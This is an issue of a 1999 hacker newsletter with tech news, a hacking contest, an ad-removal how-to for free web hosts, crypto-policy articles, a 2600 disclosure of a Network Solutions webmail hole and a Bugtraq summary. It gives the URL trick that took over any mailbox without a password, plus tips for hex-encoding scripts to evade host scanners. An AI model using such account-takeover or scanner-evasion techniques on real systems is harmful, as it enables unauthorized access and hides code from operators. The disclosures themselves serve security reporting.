http://www.wired.com/news/news/email/explode-infobeat/business/story/21879.html There are plenty of ex-hackers hanging around corporate America these days, says DefCon's founder. Breaking into networks is always better when you're paid for it. By Joanna Glasner. ++ MINDSPRING LINKS WITH EARTHLINK (BUS. 9:00 am) http://www.wired.com/news/news/email/explode-infobeat/business/story/21903.html The rival Net service providers will join forces, becoming the second-largest ISP behind AOL. ++ Thanks to myself for providing the info from my wired news feed and others from whatever sources, also to Spikeman for sending in past entries.... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (No mail worthy of posting here this issue,) Yeah we have a message board, feel free to use it, remember there are no stupid questions... well there are but if you ask something really dumb we'll just laugh at ya, lets give the message board a bit more use eh? i'll be using a real message board when the hwa-iwa.org domain comes back online (soon) meanwhile the beseen board is still up... ============================================================================== 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include <stdio.h> #include <thoughts.h> #include <backup.h> main() { printf ("Read commented source!\n\n"); /* We're still here eh? wow. Well nothing much to report, just read and * be merry. We have a new Croatian correspondant, HWA welcomes Sla5h to * the fold, check out the News from Sla5h section for stuff from .hr * * Cruciphux */ printf ("EoF.\n"); } Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 03.0 Datashark's rootfest challenge ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.provalue.net/users/nomad/hack.txt DataShark nomad@provalue.net -PRESS RELEASE- At rootfest2k I will be setting up five servers. This is the challange. The machines will be setup on the rootfest network and configured like a corprate Mission critical network there will be a POS server (prolly Novell 3.X running counterpoint) there will be a Email/fax server.(prolly running Linux) there will be a firewall(there may be week links in the firewall(i.e. a machine connected directly to the network etc)) there will be a fileserver(prolly running NT(hack it and you can keep the software) and a webserver. The webserver will be public and hosting webpages you can get a account on this machine by attaching a Text file to a email stating the username you would like as well a alternates and a password email to nomad@provalue.net now for the fun part! 1st prize goes to the person that hacks all five machines first you get a 3com Palm V or a AMD K-7 500 chip and motherboard 2nd prize goes to the person that has the most creative hack you get a 3com Palm III or a 4.5 gig SCSI drive and controler card 3rd prize goes to the person that hacks the most con particpants (you must prove this) you get a Creative Labs NOMAD mp3 player. Most pathetic person at the con gets a free copy of windows 98 and a 'Kick me I suck' t I need five volentires to secure the machine's at rootfest you CANNOT be in the callange BUT if your machine does not get owned you can keep the machine. if you are interested please email me at nomad@provalue.net If you are caught DoS attacking the machines or the rootfest network you will be delt with harshly. I am looking for hardware and software donations for the machines If you have anything you would like to donate please email me at nomad@provalue.net I will also be giving away a machine to the first person to bring me a real FBI badge it must be real. and should still have the agents photo ID with it. (if anyone has a problem with this PLEASE email me. I wish to stay on the good side of the law) @HWA 04.0 HOW-TO Beat the ADS on FWP (Free Webpage Providers) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by Smogzer url: http://smog.cjb.net email:smogzer@iname.com HOW-TO Beat the ADS on FWP (Free Webpage Providers) ? http://smog.cjb.net Version 0.9 Sep 23 1999 � 1999 SmoG Alert. INDEX : Why ? 1 - Pop-ups 1.1 - Removing the Pop-ups 1.2 - Killing pop-ups when they appear 2 - Banners 3 - Make stuff invisible (banners, counters, buttons, text, etc) 4 - Frames 5 - Remove end 6 - Avoiding rule scanners 7 - Make sure users can reach you page 8 - Contributions / Bibliography 9 - Copyright Why ? To let amateur webmasters have complete control of what they sites look like. I'm tired of seeing publicity I didn't asked for and closing pop-ups that I didn't asked to see. Having to show some advertisement spoils good webdesign. Most of the time the servers are slow enough without ads. Webmasters from sites that have publicity don't get any $ for their publicity. People are trying to offer a service to the community and the only one that gets anything from it are the sponsors. There's lots of software that blocks ads, by using this techniques viewers don't need to use that kind of software. 1 - Pop-ups : 1.1 - Removing the Pop-ups : This technique makes the browser ignore the pop-up. The pop-up is a javascript code, so if we surround the place where the server inserts this code with a <noscript> or a <!-- //--> (comment) tag the pop-up will be ignored. � Look at the example for the <!-- (comment) tag: <!-- Start code //--> <NOSCRIPT> <!-- <BODY> --> // the Decoy body tag, it can at the beginning of the head tag too </NOSCRIPT> <TITLE>Your Title Here</TITLE> </HEAD> <BODY> // The real body tag � Look at the example for the <noscript> tag: <!-- Start code //--> <NOSCRIPT> <BODY> // the server will insert their code right before or after the <body> tag so any javascript will be ignored </NOSCRIPT> � A simpler way in case you don't need to open any windows using javascript is to include this code in every page of the site. <!-- Start code //--> <SCRIPT LANGUAGE="JavaScript"> <!-- function open () {return true;} // this will redefine the open function. //--> </SCRIPT> � The jawascript method is used when the server inserts a </noscript> before the pop-up, this way the <noscript> trick won't work so if I insert a "<SCRIPT LANGUAGE="JawaScript">" (notice that jawascript can be anything, it's only convenience is looking like javascript) will disable the rest of the script. <SCRIPT LANGUAGE="JawaScript"> // just insert this line before the place where the pop-up will be. <!-- --> </noscript> <script language="JavaScript"> � This script by "the_omega" allows the opening of all urls in new windows except one called popup.html . <SCRIPT> <!-- function ScreenIt(url,name,parm){ if(url.indexOf("popup.html")!=-1) return false; return window.Xopen(url,name,parm); } window.Xopen=window.open; window.open=ScreenIt; //--> </SCRIPT> 1.2 - Killing pop-ups when they appear : � When a pop-up name open it will have a name, what this script does is open a window with that name and closing it right after. "w" is name of the window do open and close, this can be anything w is just an example. To know the "Popupname" you must look at the code the server inserts in your page and get it there. The window.focus() is optional, it will only make this window become active when the popup closes. <!-- Start code //--> <script language="JavaScript"> w=window.open("http://smog.cjb.net","Popupname",""); w.window.close(); window.focus(); <!-- End code //--> 2 - Banners : � If you need to remove a banner in a place of your choice use the make invisible technique, if the server inserts the code in the end of the document just use "remove end" of document technique. You can also replace the banner with the image you want. � If the banner is placed automatically on the beginning of the page, the best thing to do is have a layer filling the space occupied by the ad. This banner can contain a image or a solid color background. <LAYER top="27" name="top"><center> <IMG SRC="http://smog.cjb.net/logo2.gif" width="490" height="95"></center> </LAYER> � If the banner is a shtml code like <NOSCRIPT> <!--#geoguide--> </NOSCRIPT> � It's possible to change the banner to any image you want, your logo or maybe a 1x1 transparent gif . Change the "src" property of the image by refering to the image number on the page, if the banner is on top it's number must be 0 if it's the last image on the page you must count all the images, or in case the banner has a "name" property you can replace the "images[0]" with the "name" value of the image. Just insert this script after the image you want to replace. <script language="JavaScript"> <!-- document.images[0].src='banners_suck.gif'; --> </script> 3 - Make stuff invisible (banners, counters, buttons, text, etc) : � This technique is possible using layers, the variables don't really matter the important this is the "visibility=hide" part. Just add your invisible stuff to a layer like this: <ilayer id="invisible" z-index="1" visibility="hide" >Your banners,counters, text here</ilayer> The "Your banners,counters, text here" will be invisible to everyone viewing your page but not for their browsers. 4 - Frames : � This code checks for the existence of frames, if they exist the page where you put this code becomes the only page in the browser. <script language=JavaScript> if(top!=self){top.location.href=self.location.href;} </script> � or have the first page of your site point to a second one with this code on the body: <body onLoad="window.open('http://smog.cjb.net/html/index.htm','_parent')"> By opening in a _parent window the browser will go to the previous window in the history, this is the one just before the frames and open the site there. Sometimes the location that FWP give you is just an alias to your real page location. They use this aliasing method to make users load a frame, if you know where the real page is located just make some redirector point there. Just look at the xoom example "http://members.xoom.com/_XOOM/username/" is your real page location and "http://members.xoom.com/username/" is the location they use to make viewers load the adframe. To discover the real location of your site just press right mouse click on your page and look in the "info" panel. 5 - Remove end : � Sometimes servers add stuff in the end of the pages, to remove it just place <!-- or <noscript> before the place where they're publicity is going to be, the <!-- comments the rest of the file making it only visible when viewing the source, the <noscript> is used if the ad comes in form of javascript, disabling it. 6 - Avoiding rule scanners : � Some servers scan .htm files for suspect code, spliting popups names is useful when escaping this scanners. var Popup="po"+"pWind"+"ow"; window.onError=null; tasteful=window.open(newpage,wndname,""); � You should also encode your code in hexadecimal format. When it is encoded put it like this <SCRIPT> <!-- eval(unescape("your code in hex here")) //--> </SCRIPT> 7 - Make sure users can reach you page: When/If the FWP services track you they may delete your pages and the usual viewers won't be able to know the next location of your site, so you better use redirectors. You can find a list of redirectors that don't use ads on my site. With redirectors your site will look like http://smog.cjb.net , where cjb.net is the name of the redirector and smog is the name of my site. 8 - Contributions / Bibliography : Popups must die Counterexploitation and the Free Webpage Provider the_omega This is the end, I hope this tips help anybody make better, or at least less annoying web sites. Anybody that wishes to contribute to this article should e-mail smogzer@iname.com COPYRIGHT This document is Copyright � 1999 Smog Alert smogzer@iname.com . It may be freely redistributed in its entirety, including the whole of this copyright notice, but may not be changed without permission from the author. Dispensation is granted for copying small verbatim portions for the purposes of reviews or for quoting; in these circumstances, sections may be reproduced in the presence of an appropriate citation but without this copyright notice. 05.0 Even More Bad News about CESA ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond The Cyberspace Electronic Security Act (CESA) has even more bad things hidden within it than originally realized. There are at least two separate provisions that will keep " sensitive investigative techniques and industry trade secrets" quit and prevent them from being disclosed even in court. This means keeping backdoors and vulnerabilities that the software manufacturer may know about secret! You aren't even going to know if your software contains a "recovery agent". This will also allow the government to use decrypted evidence in court without revealing how they decrypted it which means whoever the defendant is will just have to believe them. Electronic Privacy Information Center http://www.epic.org/crypto/legislation/cesa/ Wired http://www.wired.com/news/news/politics/story/21810.html Decoding the Crypto Policy Change by Declan McCullagh 3:00 a.m. 17.Sep.99.PDT Why did the Clinton administration cave on crypto? What caused the nation's top generals and cops to back down this week after spending the better part of a decade warning Congress of the dangers of privacy-protecting encryption products? Why would attorney general Janet Reno inexplicably change her mind and embrace overseas sales of encryption when as recently as July she warned Congress of the "rising threat from the criminal community of commercially available encryption?" See also: Clinton Relaxes Crypto Exports and Crypto Law: Little Guy Loses It can't simply be that tech firms were pressing forward this fall with a House floor vote to relax export rules. National security and law enforcement backers in the Senate could easily filibuster the measure. Besides, Clinton had threatened to veto it. It could be the presidential ambitions of Vice President Gore, who just happened to be in Silicon Valley around the time of the White House press conference Thursday. Still, while tech CEOs can get angry over the antediluvian crypto regulations Gore has supported, they regard Y2K liability and Internet taxation as more important issues. Another answer might lie in a little-noticed section of the legislation the White House has sent to Congress. It says that during civil cases or criminal prosecutions, the Feds can use decrypted evidence in court without revealing how they descrambled it. "The court shall enter such orders and take such other action as may be necessary and appropriate to preserve the confidentiality of the technique used by the governmental entity," Section 2716 of the proposed Cyberspace Electronic Security Act says. There are a few explanations. The most obvious one goes as follows: Encryption programs, like other software, can be buggy. The US National Security Agency and other supersecret federal codebreakers have the billion-dollar budgets and hyper-smart analysts needed to unearth the bugs that are lurking in commercial products. (As recent events have shown, Microsoft Windows and Hotmail have as many security holes as a sieve after an encounter with a 12-gauge shotgun.) If the Clinton crypto proposal became law, the codebreakers' knowledge could be used to decipher communications or introduce decrypted messages during a trial. "Most crypto products are insecure. They have bugs. They have them all the time. The NSA and the FBI will be working even harder to find them," says John Gilmore, a veteran programmer and board member of the Electronic Frontier Foundation. Providing additional evidence for that view are Reno's comments on Thursday. When asked why she signed onto a deal that didn't seem to provide many obvious benefits to law enforcement, she had a ready response. "[The bill covers] the protection of methods used so that ... we will not have to reveal them in one matter and be prevented, therefore, from using them in the next matter that comes along," the attorney general said. Funding for codebreaking and uncovering security holes also gets a boost. The White House has recommended US$80 million be allocated to an FBI technical center that it says will let police respond "to the increasing use of encryption by criminals." Another reason for the sea change on crypto is decidedly more conspiratorial. But it has backers among civil libertarians and a former NSA analyst who told Wired News the explanation was "likely." It says that since the feds will continue to have control of legal encryption exports, and since they can stall a license application for years and cost a company millions in lost sales, the US government has a sizeable amount of leverage. The Commerce Department and NSA could simply pressure a firm to insert flaws into its encryption products with a back door for someone who knows how to pick the lock. Under the current and proposed new regulations, the NSA conducts a technical analysis of the product a company wishes to export. According to cryptographers who have experienced the process, it usually takes a few months and involves face-to-face meetings with NSA officials. "This may be a recipe for government-industry collusion, to build back doors into encryption products," says David Sobel, general counsel for the Electronic Privacy Information Center and a veteran litigator. Sobel points to another part of the proposed law to bolster his claim: It says any such information that a company whispers to the Feds will remain secret. That section "generally prohibits the government from disclosing trade secrets disclosed to it [by a company] to assist it in obtaining access to information protected by encryption," according to a summary prepared by the administration. Is there precedent? You bet. Just this month, a debate flared over whether or not Microsoft put a back door in Windows granting the NSA secret access to computers that run the operating system. While that widespread speculation has not been confirmed, other NSA back doors have been. In the 1982 book The Puzzle Palace, author James Bamford showed how the agency's predecessor in 1945 coerced Western Union, RCA, and ITT Communications to turn over telegraph traffic to the feds. "Cooperation may be expected for the complete intercept coverage of this material," an internal agency memo said. ITT and RCA gave the government full access, while Western Union limited the number of messages it handed over. The arrangement, according to Bamford, lasted at least two decades. In 1995, The Baltimore Sun reported that for decades NSA had rigged the encryption products of Crypto AG, a Swiss firm, so US eavesdroppers could easily break their codes. The six-part story, based on interviews with former employees and company documents, said Crypto AG sold its security products to some 120 countries, including prime US intelligence targets such as Iran, Iraq, Libya, and Yugoslavia. Crypto AG disputed the allegation. "It's a popular practice. It has long historical roots," says EFF's Gilmore. "There's a very long history of [the NSA] going quietly to some ex-military guy who happens to run the company and say, 'You could do your country a big favor if...'" Could the security flaw be detected? Probably not, said Gilmore, who during a previous job paid a programmer to spend months disassembling parts of Adobe's PostScript interpreter. "Reverse engineering is real work. The average company would rather pay an engineer to build a product rather than tear apart a competitors'." @HWA 06.0 NSI Opens New Email Hole ~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Macki Last week Network Solutions Inc. made a major security blunder by automatically opening unwanted email accounts for all of its customers and then mailing the easily guessable passwords to them in the clear. They have since revamped their free email system. Unfortunately the new system also has a gaping hole allowing anyone with an account to read anyone else's email. 2600 http://www.2600.com/2600new/092099.html update 9/24/99: A full business week has now gone by since we revealed this security hole. Apart from a story in the Boston Globe and ZDTV, the rest of the media chose to ignore this completely. Wired even wrote us to say "we do not believe this represents either a security or a privacy risk." It's hard to imagine what could be *more* of a security and privacy risk than a company running insecure software while attempting to get *all* administrative and technical contacts for *every* .com, .net, and .org site to use their system as a trusted method of communication. As of today, most of the problems seem to have been fixed, although we are still hearing from people who claim to have thousands of accounts in their browser cache which can still be logged into. Also, as of this date, no public comment has been issued on the web sites of Network Solutions, Inc. or Critical Path, Inc., the company that NSI hired to operate its web mail sites. Spokespersons from Critical Path have been quoted as saying they take responsibility for this mess but we believe a more public and lasting statement is in order. update 9/21/99: It's been a day since this problem was disclosed to the public, and almost a week since it was brought to NSI's attention. They have still yet to comment on the matter. The page that allowed people to access arbitrary email accounts has been disabled by NSI. However, if you happen to know the URL for an email box, you can still access it. For instance you can send email as microsoft@dotcomnow.com *here. Within 5 minutes of this URL being posted the account was disabled. STAY TUNED! *http://mail.dotcomnow.com/mail/compose/microsoft/0d472389db5e137350a29516aa7e8c32 As of 7:20 PM EDT, a URL to access the support account's email was working. As we were preparing to post a link, it too was disabled. Perhaps somone is paying attention. NEW INTERNIC EMAIL SECURITY HOLE 9/20/99 We have been alerted to a serious vulnerability on a free web-based e-mail service that has recently been launched by Network Solutions Inc., otherwise known as the Internic - the people responsible for registering nearly all .com, .net, and .org addresses. Anyone taking them up on their offer for "free web mail" on their www.networksolutions.com/ page is both vulnerable and capable of accessing ANY ACCOUNT on the following domains: dotexpress.com mymailbag.com nsimail.com dotcomnow.com Once you have registered an account on their system, you can change the name of your account to ANY OTHER ACCOUNT simply by entering this URL: http://mail.dotcomnow.com/signup/poll/newaccount?dlang=default NO PASSWORD IS REQUIRED. Simply replace newaccount with the name of the account you would like to access and you're in! While it's a trivial matter to guess user names, if you want a small list from the Internic's own database, simply type: whois '*@dotexpress.com' or any of the other domains they are currently running. According to the people who have alerted us of this vulnerability, NSI was informed of the security hole last week and failed to respond. We believe this may help motivate them. Have a look at some of the mail that is world readable on NSI's system. These people thought they were sending mail to the webmaster of the site. What's particularly ironic is the large number of people who were complaining about the easily guessable passwords that were mailed out - they never suspected that it was even easier to compromise their accounts without having to even guess the password! Look at the mail here : http://www.2600.com/2600new/092099-mail.html (Reprinted below) 9/20/99 The following are samples of the mail that is world readable on NSI's system. These people thought they were sending mail to the webmaster of the site. What's particularly ironic is the large number of people who were complaining about the easily guessable passwords that were mailed out - they never suspected that it was even easier to compromise their accounts without having to even guess the password! ------- Start of forwarded message ------- Subject: Whoops To: webmaster@dotcomnow.com From: pross@dotcomnow.com Date: 17 Sep 1999 11:17:44 -0700 Screwed that one up, eh? I accidentally type in the wrong username, put the matching password (random passwords? Wot's that, then?) and I get into the wrong account. Deary me. I'd better leave before someone notices. ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: Problem with email account To: webmaster@dotcomnow.com From: locke30@dotcomnow.com Cc: webmaster@netsol.com Date: 16 Sep 1999 17:10:57 -0700 The following is what I set my vacation message to after changing my password to some random garbage... I decided to entertain myself by sending you a copy: The idiots at Network Solutions decided to open thousands of accounts for its customers using easily guessable passwords (hint: really easy) These accounts were created without any input. And NSI was kind enough NOT to provide any means of removing them. With noise on the internet account about the account making it easier to hyjack domain names (gee... thanks NSI!) I was forced to log in and change my password (as were thousands of other people) Network Solutions: Yes were a monopoly damnit! (tm) If you wish to contact me, do a whois lookup for shivan.org, which was the domain that I registered with NSI that got me all this neat spam and free unsolicited wideopen email accounts. -- Bruce Locke (locke30) ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: GET YOUR SECURITY RIGHT!!! To: postmaster@netsol.com From: webmaster@dotcomnow.com Cc: postmaster@dotcomnow.com, root@netsol.com Date: 16 Sep 1999 05:36:14 PDT This Web Mail service is one big security hole. I can login to over two dozen accounts, just using 'lastname' and password 'lastnamensi'. 'webmaster' with 'webmasternsi' did work as well, just like 'admin' with 'adminnsi'. Jeez man, wake up and smell the fire.... barbaBob (P.S.: the password for this account has been changed to 'tralala'. There is a lot of e-mail here from concerned netizens trying to warn you guys. I suggest you read them) ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: You are in serious violation of critical path's policy From: cp@dotcomnow.com Cc: recipient list not shown: ; Date: 16 Sep 1999 10:53:03 -0700 Dear sir or madam, We realize that you have compromised the security of our company by changing the password of this account. We require that you change the password to 'critcalpath' You must reply to us immediately once you have changed it so that we can stop the current investigation and legal charges being brought against you. Thank You, Critical Path ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: What in the Heck were you thinking? To: webmaster@dotcomnow.com From: verpoorten@dotcomnow.com Cc: help@dotcomnow.com Date: 16 Sep 1999 08:03:10 -0700 What in the world were you thinking? You set up an e-mail acct in my name and gave me a password which was the same for every domain name (acct name and a "nsi" after it) and emailed me the acct and password without me setting it up, clearing it, or acces sing it first? This has got to be the worse example of exploitation I have ever seen with a business in your position and trust. I fear for the safety of my Domain name, my good name, and my checkbook with you in charge of Domain names now. I do not want any mail acct opened without my OK. Man, what in the name of God and all that is Holy was your company thinking when it pulled this idiotic stunt?! ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: Re: your message To: postmaster@INTEGRAM.ORG, root@INTEGRAM.ORG, info@INTEGRAM.ORG, postmaster@INTEGRAM.ORG, webmaster@INTEGRAM.ORG, hostmaster@netsol.com, postmaster@netsol.com, info@networksolutions.com, postmaster@networksolutions.com, webmaster@dotcomnow.com, info@dotcomnow.com, postmaster@dotcomnow.com From: Joost Baaij Date: Thu, 16 Sep 1999 15:58:26 +0200 Dear integram/network solutions I do not appreciate getting e-mail messages like this. I sincerely hope you will never bother me again in the future. As far as your web-based email service is concerned, i think it's an unprecedented fiasco by generating easy to guess passwords. I STRONGLY suggest you IMMEDIATELY take action and modofy ALL passwords on that system. I've heard several reports of people breaking into the dotcomnow email service that weren't supposed to. I'm stunned and shocked to see your company do such an utterly DUMB thing. Please correct it NOW. -- ------------------------------------------------------------------------ Barito Innovators B.V. Joost Baaij De Mulderij 4, 3831 NV Leusden P.O. Box 387, 3830 AK Leusden The Netherlands Phone +31 (0)33 494 79 71 j.baaij@barito.nl Fax +31 (0)33 494 85 44 Internet http://www.barito.nl ------------------------------------------------------------------------ ------- End of forwarded message ------- ------- Start of forwarded message ------- To: webmaster@nsi.com From: lewis@dotcomnow.com Cc: webmaster@dotcomnow.com Date: 16 Sep 1999 06:08:38 -0700 god you guys suck nice default passwords morons ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: you people fucking stupid or what To: webmaster@dotcomnow.com From: testa28@dotcomnow.com Date: 16 Sep 1999 05:32:59 -0700 what in the hell where you people thinking by sending out generic passwords for every acct. Are your security people just stupid or what? Since you've been monopolizing the domain world for so long, has all common sense gone to the wayside? I can't believe the number of idiots that work there and that anyone thought this was a good idea. Since i'm up for renewal in 3 months, i'll have to seriously contemplate staying with people who are ignorant and stupid. ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: security? (or complete lack thereof) To: hostmaster@netsol.com, webmaster@dotcomnow.com From: hostmaster360@dotcomnow.com Cc: aaron@abelard.com Date: 16 Sep 1999 01:04:25 -0700 you've got to be kidding me. your lack of any forethought in assinging passwords has turned a potentially useful system into a potentially large problem. aaron abelard / aa203 ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: Re: To: lewis@dotcomnow.com From: webmaster@dotcomnow.com Date: 17 Sep 1999 23:27:34 PDT Hi Luie, That ain't the half of it... Why don't you be webmaster.... http://mail.dotcomnow.com/signup/poll/webmaster?dlang=default On Thu, 16 September 1999, lewis@dotcomnow.com wrote: > > > god you guys suck > > nice default passwords > > morons > > > > ------------------------------------------------- > Get personalized e-mail and a web address or your > own free e-mail at http://www.networksolutions.com. ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: You boneheads To: postmaster@dotcomnow.com From: droelands@dotcomnow.com Date: 16 Sep 1999 17:36:40 -0700 Thanks for nothing. You create an email account in my name, without my consent, and assign it a password that is incredibly easy to hack? What have you been inhaling? I have no intent to use this service. I configured my password simply to protect myself. Furthermore, when my domains expire, I'll be sure to re-register them with another service. Morons... ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- ------- Start of forwarded message ------- Subject: How stupid can you be?!?!?!?! To: admin@dotcomnow.com, root@dotcomnow.com, postmaster@dotcomnow.com From: toups2@dotcomnow.com Date: 16 Sep 1999 06:53:53 -0700 First off, what right does Network Solutions have spamming my mailbox with your web based mail service. Just because I HAVE to use your monopolistic service to register domains DOES NOT give you the right to SPAM my work e-mail account. Second, is their cow manure in place of brains in your head? How dare you send out a clear text password that effects my domains in e-mail? What Mickey Mouse Security Course did you take? I will be writing my congressman and senator to insure that Network Solution loses all ability to manage domain names. This behavior is the absolute worst and should not be rewarded. Sincerely yours, A VERY DISGRUNTLED DOMAIN OWNER ------------------------------------------------- Get personalized e-mail and a web address or your own free e-mail at http://www.networksolutions.com. ------- End of forwarded message ------- @HWA 07.0 Security Focus Newsletter for September ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Date: Mon, 20 Sep 1999 10:42:15 -0700 Reply-To: Alfred Huger <ah@SECURITYFOCUS.COM> Sender: SF-NEWS Mailing List <SF-NEWS@SECURITYFOCUS.COM> From: Alfred Huger <ah@SECURITYFOCUS.COM> Subject: Security Focus Newsletter #7 X-To: sf-news@securityfocus.com To: SF-NEWS@SECURITYFOCUS.COM Security Focus Newsletter #07 Table of Contents: I. INTRODUCTION II. BUGTRAQ SUMMARY 1. Hotmail Javascript STYLE Vulnerability 2. Netscape Enterprise SSL Handshake Patch Accept Buffer Overflow Vulnerability 3. NetcPlus @Work SmartServer3 SMTP Buffer Overflow 4. Computalynx CMail SMTP Buffer Overflow Vulnerability 5. NT RASMAN Privilege Escalation Vulnerability 6. FuseWare FuseMail POP Mail Buffer Overflow Vulnerability 7. Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability 8. Multiple Vendor CDE dtspcd Vulnerability 9. Multiple Vendor CDE ttsession Vulnerability 10. Multiple Vendor CDE TT_SESSION Buffer Overflow Vulnerability 11. FreeBSD fts Library Buffer Overflow Vulnerability III. PATCH UPDATES 1. Vendor: ProFTP IV. INCIDENTS SUMMARY 1. Stray FIN packets... V. VULN-DEV RESEARCH LIST SUMMARY 1. Guestbook perl script (long) (Thread) 2. VULN-DEV Administrivia #2143 3. Administrivia #2685 4. [Fwd: your guestbook] VI. SECURITY JOBS Seeking Employment: 1. Contact: M Simkin <msimkin@primenet.com> Seeking Staff: 1. Nokia: SE Position Routing/Firewall/VPN 2. System Administrator - Unix - New York City 3. Chief Security Officer #406 4. Computer Systems Programmer 5. Information Security Analyst 6. Information Security Engineer 7. Project Manager for the Information Security Group VII. SECURITY SURVEY RESULTS VIII. SECURITY FOCUS EVENTS 1. New Features In Tools Section IX. SECURITY FOCUS TOP 6 TOOLS 1. Stack Shield 0.5 beta (UNIX) 2. rinetd (for Win9x/NT) 3. rinetd (UNIX) 4. Subotronic (Win9x/NT) 5. ShoWin (Win9x/NT) 6. Boping (Win9x/NT) X. SPONSOR INFORMATION - Tripwire Security I. INTRODUCTION Welcome to the 7th edition of the Security Focus Newsletter. The last week has been a busy one with Security Focus with the high point being that we are now moved to a higher bandwidth facility to better meet user demands. II. BUGTRAQ SUMMARY 1999-09-11 to 1999-09-19 --------------------------------------------- 1. Hotmail Javascript STYLE Vulnerability BUGTRAQ ID: 630 Remote: Yes Date Published: 1999-09-13 Relevant URL: http://www.securityfocus.com/bid/630 Summary: The HTML STYLE command can be used to embed Javascript into Hotmail email messages. The STYLE tag circumvents current methods employed by Hotmail to disable Javascript from email messages. When viewed by a Microsoft IE 5.0 or Netscape Navigator 4.X browser, the Javascript in the email may execute various commands on the viewer's mailbox. The commands could take various actions on the user's inbox, including: reading email, deleting email, or prompting users to re-enter their password in a trojan application. 2. Netscape Enterprise SSL Handshake Patch Accept Buffer Overflow Vulnerability BUGTRAQ ID: 631 Remote: Yes Date Published: 1999-09-13 Relevant URL: http://www.securityfocus.com/bid/631 Summary: The Enterprise Server 3.6 SP2 with the SSL Handshake Patch applied is vulnerable to a buffer overflow that will DoS the service and may allow arbitrary commands to be executed on the web server. 3. NetcPlus @Work SmartServer3 SMTP Buffer Overflow BUGTRAQ ID: 632 Remote: Yes Date Published: 1999-09-13 Relevant URL: http://www.securityfocus.com/bid/632 Summary: There is a buffer overflow on the @Work SmartServer3 SMTP service (long MAIL FROM:) that may allow an intruder to execute arbitrary code on the target server. 4. Computalynx CMail SMTP Buffer Overflow Vulnerability BUGTRAQ ID: 633 Remote: Yes Date Published: 1999-09-13 Relevant URL: http://www.securityfocus.com/bid/633 Summary: There is a buffer overflow in the CMail SMTP service (long MAIL FROM:) that may allow an attacker to execute arbitrary code on the target server. 5. NT RASMAN Privilege Escalation Vulnerability BUGTRAQ ID: 645 Remote: Yes Date Published: 1999-09-17 Relevant URL: http://www.securityfocus.com/bid/645 Summary: Any authenticated NT user (IE domain user) can modify the pathname for the RASMAN binary in the Registry. The next time the RAS Service is started, the (trojan) service referenced by the RASMAN pathname will be executed with system privileges. This trojan service may allow the User to execute commands on the target server as an administrator, including elevating the privileges of their own account to that of Administrator. 6. FuseWare FuseMail POP Mail Buffer Overflow Vulnerability BUGTRAQ ID: 634 Remote: Yes Date Published: 1999-09-13 Relevant URL: http://www.securityfocus.com/bid/634 Summary: There is a buffer overflow in the FuseMail POP service (long USER,PASS) that may allow an intruder to execute arbitrary code on the target server. 7. Multiple Vendor CDE dtaction Userflag Buffer Overflow Vulnerability BUGTRAQ ID: 635 Remote: No Date Published: 1999-09-13 Relevant URL: http://www.securityfocus.com/bid/635 Summary: Under some distributions of CDE Common Desktop Environment, the dtaction program has a locally exploitable buffer overflow condition. dtaction is a program which allows applications or shell scripts that otherwise are not connected into the CDE development environment, to request that CDE actions be performed. The buffer overflow condition exists in the argument parsing code for the -u (user) function. Any information provided by the user over 1024 bytes may overwrite the buffer and in return be exploited by a malicious user. 8. Multiple Vendor CDE dtspcd Vulnerability BUGTRAQ ID: 636 Remote: No Date Published: 1999-09-13 Relevant URL: http://www.securityfocus.com/bid/636 Summary: This explanation is quoted from the initial post on this problem by Job De Hass. This message is available in it's entirety in the 'Credit' section of this vulnerability entry. The CDE subprocess daemon /usr/dt/bin/dtspcd contains an insufficient check on client credentials. The CDE subprocess daemon allows cross-platform invocation of applications. In order to authenticate the remote user, the daemon generates a filename which is to be created by the client and then is verified by the daemon. When verifying the created file, the daemon uses stat() instead of lstat() and is subsequently vulnerable to a symlink attack. Further more the daemon seems to allow empty usernames and then reverts to a publicly write-able directory (/var/dt/tmp). 9. Multiple Vendor CDE ttsession Vulnerability BUGTRAQ ID: 637 Remote: Yes Date Published: 1999-09-13 Relevant URL: http://www.securityfocus.com/bid/637 Summary: Under some versions of CDE the ToolTalk session daemon ttsession does not properly check client credentials. The insufficient credentials check can lead to compromise of a system from both local and remote with the credentials of the user running ttsession. Note that ttsession is not a system daemon and may not be running all the time. It is normally started as part of an X-session. Also 